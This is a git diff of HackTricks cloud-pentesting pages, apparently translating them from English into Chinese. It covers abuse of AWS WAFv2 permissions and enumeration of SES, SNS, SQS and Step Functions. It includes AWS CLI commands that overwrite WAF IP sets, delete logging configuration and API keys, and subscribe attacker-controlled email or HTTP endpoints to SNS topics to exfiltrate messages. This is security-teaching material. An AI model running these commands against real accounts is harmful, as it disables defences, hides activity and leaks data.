to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources. - +攻击者将能够创建、更新和删除由 AWS WAF 管理的 IP 集。这可能是危险的,因为攻击者可以创建新的 IP 集以允许恶意流量,修改 IP 集以阻止合法流量,更新现有 IP 集以包含恶意 IP 地址,移除受信任的 IP 地址或删除旨在保护关键资源的关键 IP 集。 ```bash # Create IP set aws wafv2 create-ip-set --name --ip-address-version --addresses --scope | CLOUDFRONT --region=us-east-1> @@ -389,23 +370,19 @@ aws wafv2 update-ip-set --name --id --addresses --lock-t # Delete IP set aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` - -The following example shows how to **overwrite the existing IP set by the desired IP set**: - +以下示例演示了如何**用所需的 IP 集覆盖现有的 IP 集**: ```bash aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 ``` - -**Potential Impact**: Unauthorized access and block of legitimate traffic. +**潜在影响**:未经授权的访问和合法流量的阻止。 #### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`** -An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns. - -- Creating new regex patterns would help an attacker to allow harmful content -- Updating the existing patterns, an attacker would to bypass security rules -- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. +拥有这些权限的攻击者将能够操纵 AWS WAF 使用的正则表达式模式集,以根据特定模式控制和过滤传入流量。 +- 创建新的正则表达式模式将帮助攻击者允许有害内容 +- 更新现有模式,攻击者将能够绕过安全规则 +- 删除旨在阻止恶意活动的模式可能导致攻击者发送恶意有效负载并绕过安全措施。 ```bash # Create regex pattern set aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] @@ -414,62 +391,51 @@ aws wafv2 update-regex-pattern-set --name --id --regular-express # Delete regex pattern set aws wafv2 delete-regex-pattern-set --name --scope | CLOUDFRONT --region=us-east-1> --id --lock-token ``` - -**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF. +**潜在影响**:绕过安全控制,允许恶意内容并可能暴露敏感数据或干扰受 AWS WAF 保护的服务和资源。 #### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`** -An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control. +拥有 **`wafv2:DeleteLoggingConfiguration`** 权限的攻击者将能够从指定的 Web ACL 中删除日志配置。随后,凭借 **`wavf2:PutLoggingConfiguration`** 和 **`iam:CreateServiceLinkedRole`** 权限,攻击者可以创建或替换日志配置(在删除后)以完全阻止日志记录或将日志重定向到未经授权的目的地,例如 Amazon S3 存储桶、Amazon CloudWatch Logs 日志组或受控的 Amazon Kinesis Data Firehose。 -During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination: +在创建过程中,该服务会自动设置必要的权限,以允许日志写入指定的日志目的地: -- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. -- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. -- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. +- **Amazon CloudWatch Logs:** AWS WAF 在指定的 CloudWatch Logs 日志组上创建资源策略。该策略确保 AWS WAF 拥有将日志写入日志组所需的权限。 +- **Amazon S3 存储桶:** AWS WAF 在指定的 S3 存储桶上创建存储桶策略。该策略授予 AWS WAF 上传日志到指定存储桶所需的权限。 +- **Amazon Kinesis Data Firehose:** AWS WAF 创建一个专门用于与 Kinesis Data Firehose 交互的服务链接角色。该角色允许 AWS WAF 将日志传送到配置的 Firehose 流。 > [!NOTE] -> It is possible to define only one logging destination per web ACL. - +> 每个 web ACL 只能定义一个日志目的地。 ```bash # Put logging configuration aws wafv2 put-logging-configuration --logging-configuration # Delete logging configuration aws wafv2 delete-logging-configuration --resource-arn [--log-scope ] [--log-type ] ``` - -**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments. +**潜在影响:** 对安全事件的可见性模糊,导致事件响应过程困难,并促进在AWS WAF保护环境内的隐秘恶意活动。 #### **`wafv2:DeleteAPIKey`** -An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource. - +拥有此权限的攻击者将能够删除现有的API密钥,使CAPTCHA失效,并干扰依赖于它的功能,例如表单提交和访问控制。根据此CAPTCHA的实现,这可能导致CAPTCHA绕过或在资源的错误管理未正确设置时导致DoS。 ```bash # Delete API key aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> ``` - -**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft. +**潜在影响**:禁用 CAPTCHA 保护或干扰应用程序功能,导致安全漏洞和潜在数据泄露。 #### **`wafv2:TagResource`, `wafv2:UntagResource`** -An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations. - +攻击者将能够添加、修改或删除 AWS WAFv2 资源的标签,例如 Web ACL、规则组、IP 集、正则表达式模式集和日志配置。 ```bash # Tag aws wafv2 tag-resource --resource-arn --tags # Untag aws wafv2 untag-resource --resource-arn --tag-keys ``` +**潜在影响**:资源篡改、信息泄露、成本操控和操作中断。 -**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption. - -## References +## 参考文献 - [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md index bc6af90f1..74c43743f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md @@ -2,45 +2,40 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes. +Amazon Simple Email Service (Amazon SES) 旨在 **发送和接收电子邮件**。它使用户能够高效且安全地大规模发送事务性、营销或通知电子邮件。它 **与其他 AWS 服务集成良好**,为各类企业提供了管理电子邮件通信的强大解决方案。 -You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails). +您需要注册 **身份**,这些身份可以是能够与 SES 交互的域名或电子邮件地址(例如,发送和接收电子邮件)。 -### SMTP User - -It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as: +### SMTP 用户 +可以连接到 **AWS 的 SMTP 服务器以执行操作**,而不是使用 AWS API(或作为补充)。为此,您需要创建一个具有以下策略的用户: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "ses:SendRawEmail", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "ses:SendRawEmail", +"Resource": "*" +} +] } ``` - -Then, gather the **API key and secret** of the user and run: - +然后,收集用户的 **API 密钥和秘密** 并运行: ```bash git clone https://github.com/lisenet/ses-smtp-converter.git cd ./ses-smtp-converter chmod u+x ./ses-smtp-conv.sh ./ses-smtp-conv.sh ``` +从AWS控制台网页上也可以做到这一点。 -It's also possible to do this from the AWS console web. - -### Enumeration +### 枚举 > [!WARNING] -> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. - +> 请注意,SES有两个API:**`ses`**和**`sesv2`**。某些操作在两个API中都有,而其他操作仅在其中一个中。 ```bash # Get info about the SES account aws sesv2 get-account @@ -117,15 +112,10 @@ aws ses get-send-quota ## Get statistics aws ses get-send-statistics ``` - -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-ses-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md index cca4353cb..7a73e9b31 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md @@ -4,18 +4,17 @@ ## SNS -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. +亚马逊简单通知服务(Amazon SNS)被描述为一个**完全托管的消息服务**。它支持**应用程序到应用程序**(A2A)和**应用程序到个人**(A2P)通信类型。 -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. +A2A通信的关键特性包括**发布/订阅(pub/sub)机制**。这些机制引入了**主题**,对于实现高吞吐量的**推送式、多对多消息传递**至关重要。此功能在涉及分布式系统、微服务和事件驱动的无服务器架构的场景中非常有利。通过利用这些主题,发布系统可以有效地将消息分发给**广泛的订阅系统**,促进扇出消息模式。 -### **Difference with SQS** +### **与SQS的区别** -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. - -### **Enumeration** +**SQS**是一个**基于队列**的服务,允许点对点通信,确保消息由**单个消费者**处理。它提供**至少一次交付**,支持标准和FIFO队列,并允许消息保留以进行重试和延迟处理。\ +另一方面,**SNS**是一个**基于发布/订阅的服务**,通过同时向**多个订阅者**广播消息,实现**一对多**通信。它支持**各种订阅端点,如电子邮件、短信、Lambda函数和HTTP/HTTPS**,并提供针对性消息传递的过滤机制。\ +虽然这两项服务都能实现分布式系统中组件之间的解耦,但SQS专注于排队通信,而SNS强调事件驱动的扇出通信模式。 +### **枚举** ```bash # Get topics & subscriptions aws sns list-topics @@ -24,60 +23,55 @@ aws sns list-subscriptions-by-topic --topic-arn # Check privescs & post-exploitation aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt +--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ +--message file://message.txt # Exfiltrate through email ## You will receive an email to confirm the subscription aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com +--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ +--protocol email \ +--notification-endpoint my-email@example.com # Exfiltrate through web server ## You will receive an initial request with a URL in the field "SubscribeURL" ## that you need to access to confirm the subscription aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn +--protocol http \ +--notification-endpoint http:/// \ +--topic-arn ``` - > [!CAUTION] -> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). +> 注意,如果**主题是FIFO类型**,则只能使用协议**SQS**的订阅者(不能使用HTTP或HTTPS)。 > -> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. +> 此外,即使`--topic-arn`包含区域,也请确保在**`--region`**中指定正确的区域,否则您将收到一个错误,表明您没有访问权限,但问题在于区域。 -#### Unauthenticated Access +#### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md {{#endref}} -#### Privilege Escalation +#### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-sns-privesc.md {{#endref}} -#### Post Exploitation +#### 利用后 {{#ref}} ../aws-post-exploitation/aws-sns-post-exploitation.md {{#endref}} -#### Persistence +#### 持久性 {{#ref}} ../aws-persistence/aws-sns-persistence.md {{#endref}} -## References +## 参考 - [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md index 1da888587..fffbefc45 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md @@ -4,10 +4,9 @@ ## SQS -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. +亚马逊简单队列服务(SQS)被呈现为一个**完全托管的消息队列服务**。其主要功能是帮助扩展和解耦微服务、分布式系统和无服务器应用程序。该服务旨在消除管理和操作面向消息的中间件的需求,这通常可能是复杂且资源密集的。这种复杂性的消除使开发人员能够将精力集中在他们工作中更具创新性和差异化的方面。 ### Enumeration - ```bash # Get queues info aws sqs list-queues @@ -18,40 +17,35 @@ aws sqs receive-message --queue-url aws sqs send-message --queue-url --message-body ``` - > [!CAUTION] -> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. +> 此外,即使 `--queue-url` 包含区域,也请确保在 **`--region`** 中指定正确的区域,否则您将收到一个错误,表明您没有访问权限,但问题实际上是区域。 -#### Unauthenticated Access +#### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md {{#endref}} -#### Privilege Escalation +#### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-sqs-privesc.md {{#endref}} -#### Post Exploitation +#### 利用后的操作 {{#ref}} ../aws-post-exploitation/aws-sqs-post-exploitation.md {{#endref}} -#### Persistence +#### 持久性 {{#ref}} ../aws-persistence/aws-sqs-persistence.md {{#endref}} -## References +## 参考 - https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md index 873629bba..f7c153158 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md @@ -4,266 +4,253 @@ ## Step Functions -AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL). +AWS Step Functions 是一个工作流服务,使您能够协调和编排多个 AWS 服务到无服务器工作流中。通过使用 AWS Step Functions,您可以设计和运行连接各种 AWS 服务(如 AWS Lambda、Amazon S3、Amazon DynamoDB 等)的工作流,按步骤顺序进行。这项编排服务提供了可视化工作流界面,并提供 **状态机** 功能,允许您使用基于 JSON 的 **Amazon States Language** (ASL) 以声明性方式定义工作流的每个步骤。 ## Key concepts ### Standard vs. Express Workflows -AWS Step Functions offers two types of **state machine workflows**: Standard and Express. +AWS Step Functions 提供两种类型的 **状态机工作流**:标准和快速。 -- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. -- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. +- **Standard Workflow**:此默认工作流类型旨在用于长时间运行、持久和可审计的过程。它支持 **exactly-once execution**,确保任务仅运行一次,除非指定重试。它非常适合需要详细执行历史的工作流,并且可以运行长达一年。 +- **Express Workflow**:此类型非常适合高容量、短时任务,运行时间最长可达五分钟。它们支持 **at-least-once execution**,适合幂等任务,如数据处理。这些工作流针对成本和性能进行了优化,按执行次数、持续时间和内存使用量收费。 ### States -States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type: +状态是状态机的基本单元。它们定义工作流中的各个步骤,能够根据其类型执行各种功能: -- **Task:** Executes a job, often using an AWS service like Lambda. -- **Choice:** Makes decisions based on input. -- **Fail/Succeed:** Ends the execution with a failure or success. -- **Pass:** Passes input to output or injects data. -- **Wait:** Delays execution for a set time. -- **Parallel:** Initiates parallel branches. -- **Map:** Dynamically iterates steps over items. +- **Task:** 执行一个作业,通常使用 AWS 服务,如 Lambda。 +- **Choice:** 根据输入做出决策。 +- **Fail/Succeed:** 以失败或成功结束执行。 +- **Pass:** 将输入传递到输出或注入数据。 +- **Wait:** 延迟执行一段时间。 +- **Parallel:** 启动并行分支。 +- **Map:** 动态迭代步骤以处理项目。 ### Task -A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs. +**Task** 状态表示由状态机执行的单个工作单元。任务可以调用各种资源,包括活动、Lambda 函数、AWS 服务或第三方 API。 -- **Activities**: Custom workers you manage, suitable for long-running processes. - - Resource: **`arn:aws:states:region:account:activity:name`**. -- **Lambda Functions**: Executes AWS Lambda functions. - - Resource: **`arn:aws:lambda:region:account:function:function-name`**. -- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. - - Resource: **`arn:partition:states:region:account:servicename:APIname`**. -- **HTTP Task**: Calls third-party APIs. - - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. - -The following example shows a Task state definition that invokes a Lambda function called HelloWorld: +- **Activities**: 您管理的自定义工作者,适合长时间运行的过程。 +- Resource: **`arn:aws:states:region:account:activity:name`**. +- **Lambda Functions**: 执行 AWS Lambda 函数。 +- Resource: **`arn:aws:lambda:region:account:function:function-name`**. +- **AWS Services**: 直接与其他 AWS 服务集成,如 DynamoDB 或 S3。 +- Resource: **`arn:partition:states:region:account:servicename:APIname`**. +- **HTTP Task**: 调用第三方 API。 +- Resource field: **`arn:aws:states:::http:invoke`**. 然后,您应该提供 API 端点配置详细信息,例如 API URL、方法和身份验证详细信息。 +以下示例显示了一个调用名为 HelloWorld 的 Lambda 函数的 Task 状态定义: ```json "HelloWorld": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "Payload.$": "$", - "FunctionName": "arn:aws:lambda:::function:HelloWorld" - }, - "End": true +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"Payload.$": "$", +"FunctionName": "arn:aws:lambda:::function:HelloWorld" +}, +"End": true } ``` - ### Choice -A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results. +一个 **Choice** 状态为工作流添加条件逻辑,使其能够根据输入数据做出决策。它评估指定的条件,并根据结果转换到相应的状态。 -- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. -- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. - -Example of **Choice** state: +- **Comparison**: 每个选择规则包括一个比较运算符(例如,**`NumericEquals`**,**`StringEquals`**),用于将输入变量与指定值或另一个变量进行比较。 +- **Next Field**: Choice 状态不支持 **`End`** 字段,而是定义 **`Next`** 状态,以便在比较为真时进行转换。 +**Choice** 状态的示例: ```json { - "Variable": "$.timeStamp", - "TimestampEquals": "2000-01-01T00:00:00Z", - "Next": "TimeState" +"Variable": "$.timeStamp", +"TimestampEquals": "2000-01-01T00:00:00Z", +"Next": "TimeState" } ``` - ### Fail/Succeed -A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow. +一个 **`Fail`** 状态停止状态机的执行并将其标记为失败。它用于指定错误名称和原因,提供有关失败的详细信息。此状态是终端状态,意味着它结束执行流程。 -A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field. +一个 **`Succeed`** 状态成功地停止执行。它通常用于在工作流成功完成时终止工作流。此状态不需要 **`Next`** 字段。 {{#tabs }} {{#tab name="Fail example" }} - ```json "FailState": { - "Type": "Fail", - "Error": "ErrorName", - "Cause": "Error details" +"Type": "Fail", +"Error": "ErrorName", +"Cause": "Error details" } ``` - {{#endtab }} -{{#tab name="Succeed example" }} - +{{#tab name="成功示例" }} ```json "SuccessState": { - "Type": "Succeed" +"Type": "Succeed" } ``` - {{#endtab }} {{#endtabs }} ### Pass -A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it. - +一个 **Pass** 状态将其输入传递给输出,既不执行任何工作,也不使用过滤器转换 JSON 状态输入,然后将转换后的数据传递给下一个状态。它对于测试和构建状态机非常有用,允许您注入静态数据或对其进行转换。 ```json "PassState": { - "Type": "Pass", - "Result": {"key": "value"}, - "ResultPath": "$.newField", - "Next": "NextState" +"Type": "Pass", +"Result": {"key": "value"}, +"ResultPath": "$.newField", +"Next": "NextState" +} +``` +### Wait + +一个 **Wait** 状态会延迟状态机的执行,直到指定的持续时间。配置等待时间的主要方法有三种: + +- **X Seconds**: 固定的等待秒数。 + +```json +"WaitState": { +"Type": "Wait", +"Seconds": 10, +"Next": "NextState" } ``` -### Wait +- **Absolute Timestamp**: 等待直到的确切时间。 -A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time: +```json +"WaitState": { +"Type": "Wait", +"Timestamp": "2024-03-14T01:59:00Z", +"Next": "NextState" +} +``` -- **X Seconds**: A fixed number of seconds to wait. +- **Dynamic Wait**: 基于输入使用 **`SecondsPath`** 或 **`TimestampPath`**。 - ```json - "WaitState": { - "Type": "Wait", - "Seconds": 10, - "Next": "NextState" - } - ``` - -- **Absolute Timestamp**: An exact time to wait until. - - ```json - "WaitState": { - "Type": "Wait", - "Timestamp": "2024-03-14T01:59:00Z", - "Next": "NextState" - } - ``` - -- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. - - ```json - jsonCopiar código - "WaitState": { - "Type": "Wait", - "TimestampPath": "$.expirydate", - "Next": "NextState" - } - ``` +```json +jsonCopiar código +"WaitState": { +"Type": "Wait", +"TimestampPath": "$.expirydate", +"Next": "NextState" +} +``` ### Parallel -A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are: - -- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. -- **ResultPath**: Defines where (in the input) to place the combined output of the branches. -- **Retry and Catch**: Error handling configurations for the parallel state. +一个 **Parallel** 状态允许您在工作流中并发执行多个任务分支。每个分支独立运行并处理自己的状态序列。执行会等待所有分支完成后再继续到下一个状态。其关键字段包括: +- **Branches**: 定义并行执行路径的数组。每个分支是一个单独的状态机。 +- **ResultPath**: 定义将分支的合并输出放置在输入中的位置。 +- **Retry and Catch**: 并行状态的错误处理配置。 ```json "ParallelState": { - "Type": "Parallel", - "Branches": [ - { - "StartAt": "Task1", - "States": { ... } - }, - { - "StartAt": "Task2", - "States": { ... } - } - ], - "Next": "NextState" +"Type": "Parallel", +"Branches": [ +{ +"StartAt": "Task1", +"States": { ... } +}, +{ +"StartAt": "Task2", +"States": { ... } +} +], +"Next": "NextState" +} +``` +### Map + +一个 **Map** 状态允许对数据集中的每个项目执行一组步骤。它用于数据的并行处理。根据您希望如何处理数据集中的项目,Step Functions 提供以下模式: + +- **Inline Mode**: 对每个 JSON 数组项执行一组状态的子集。适用于并行迭代少于 40 次的小规模任务,在包含 **`Map`** 状态的工作流上下文中运行每个任务。 + +```json +"MapState": { +"Type": "Map", +"ItemsPath": "$.arrayItems", +"ItemProcessor": { +"ProcessorConfig": { +"Mode": "INLINE" +}, +"StartAt": "AddState", +"States": { +"AddState": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"OutputPath": "$.Payload", +"Parameters": { +"FunctionName": "arn:aws:lambda:::function:add-function" +}, +"End": true +} +} +}, +"End": true +"ResultPath": "$.detail.added", +"ItemsPath": "$.added" } ``` -### Map +- **Distributed Mode**: 设计用于大规模并行处理,具有高并发性。支持处理大型数据集,例如存储在 Amazon S3 中的数据集,允许高达 10,000 个并行子工作流执行,这些子工作流作为单独的子执行运行。 -A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes: - -- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. - - ```json - "MapState": { - "Type": "Map", - "ItemsPath": "$.arrayItems", - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "INLINE" - }, - "StartAt": "AddState", - "States": { - "AddState": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "OutputPath": "$.Payload", - "Parameters": { - "FunctionName": "arn:aws:lambda:::function:add-function" - }, - "End": true - } - } - }, - "End": true - "ResultPath": "$.detail.added", - "ItemsPath": "$.added" - } - ``` - -- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. - - ```json - "DistributedMapState": { - "Type": "Map", - "ItemReader": { - "Resource": "arn:aws:states:::s3:getObject", - "Parameters": { - "Bucket": "my-bucket", - "Key": "data.csv" - } - }, - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "DISTRIBUTED", - "ExecutionType": "EXPRESS" - }, - "StartAt": "ProcessItem", - "States": { - "ProcessItem": { - "Type": "Task", - "Resource": "arn:aws:lambda:region:account-id:function:my-function", - "End": true - } - } - }, - "End": true - "ResultWriter": { - "Resource": "arn:aws:states:::s3:putObject", - "Parameters": { - "Bucket": "myOutputBucket", - "Prefix": "csvProcessJobs" - } - } - } - ``` +```json +"DistributedMapState": { +"Type": "Map", +"ItemReader": { +"Resource": "arn:aws:states:::s3:getObject", +"Parameters": { +"Bucket": "my-bucket", +"Key": "data.csv" +} +}, +"ItemProcessor": { +"ProcessorConfig": { +"Mode": "DISTRIBUTED", +"ExecutionType": "EXPRESS" +}, +"StartAt": "ProcessItem", +"States": { +"ProcessItem": { +"Type": "Task", +"Resource": "arn:aws:lambda:region:account-id:function:my-function", +"End": true +} +} +}, +"End": true +"ResultWriter": { +"Resource": "arn:aws:states:::s3:putObject", +"Parameters": { +"Bucket": "myOutputBucket", +"Prefix": "csvProcessJobs" +} +} +} +``` ### Versions and aliases -Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine. +Step Functions 还允许您通过状态机的 **versions** 和 **aliases** 管理工作流部署。版本表示可以执行的状态机快照。别名作为指向最多两个版本的状态机的指针。 -- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. -- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to 